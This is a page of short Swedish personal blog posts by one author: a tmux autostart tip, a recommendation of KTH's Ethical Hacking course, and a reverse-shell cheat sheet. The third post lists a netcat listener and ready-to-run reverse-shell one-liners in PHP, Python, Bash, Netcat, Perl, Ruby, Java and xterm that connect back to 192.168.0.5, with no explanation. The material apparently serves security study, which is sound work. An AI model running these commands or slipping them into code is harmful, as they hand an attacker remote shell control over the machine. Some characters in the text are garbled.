Författare: Jörgen (Sida 4 av 119)

tmux och bashrc

Jag har haft problem med att få min tmux session att automatiskt starta när jag ansluter till servern med putty, Det hände helt enkelt ingenting.

Det jag ville skulle ske när jag loggar in är att kommandot: tmux attach-session -t shell skulle köras helt automagiskt. Det låter mig ha min ’vanliga’ session igång så att jag lätt kan logga in och fortsätta där jag var efter att jag pausat och stängt putty.

Helsmidigt, det kommandot gör är att ansluta till sessionen som heter shell, om den inte finns så skapas en ny.

Problemet är att om jag lägger in kommandot i .bashrc s? körs det inte 🙁

Magin ligger i att lägga kommandor i filen .bash_profile då fungerar allt!

Lite tmux info:
https://tmuxcheatsheet.com/
http://man7.org/linux/man-pages/man1/tmux.1.html
https://thoughtbot.com/blog/a-tmux-crash-course

<TL;DR;> Lägg tmux attach-session -t shell i .bash_profile

Ethical Hacking

I samband med min kurs i Ethical Hacking fick jag fr?gan om jag vill ber?tta om den, nedan kan du se vad jag tyckte.

Jag kan varmt rekommendera KTH’s distanskurs i Ethical Hacking (7.5hp), mycket bra kurs om du har intresse och vill f? en bra grund att bygga vidare p?, eller om du bara vill veta mer s? att du kan s?kra upp ditt online-liv.

H?r finns information om kursen: https://www.kth.se/nse/studies/online-course-in-ethical-hacking-7-5-hp

L?nk till artikeln

https://www.kth.se/nse/studies/online-course-in-ethical-hacking-7-5-hp/students/to-win-over-the-hacks-you-have-to-think-like-the-hacker-1.824598

Och som PDF

To win over the hacks, you have to think like the hacker_ _ KTH

Reverse shell

B?rja med att skriva det h?r lokalt: nc -l -p 4444 -vvv

Och p? remote sidan g?r du n?gon av dessa

Php :

php -r '$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Python :

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash :

bash -i >& /dev/tcp/192.168.0.5/4444 0>&1

Netcat :

nc -e /bin/sh 192.168.0.5 4444

Perl :

perl -e 'use Socket;$i="192.168.0.5";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby :

ruby -rsocket -e'f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java :

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.5/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm :

xterm -display 192.168.0.5:4444

Source https://github.com/ismailtasdelen/reverse-shell-cheatsheet

« Äldre inlägg Nyare inlägg »

© 2024 Editio Princeps

Tema av Anders NorenUpp ↑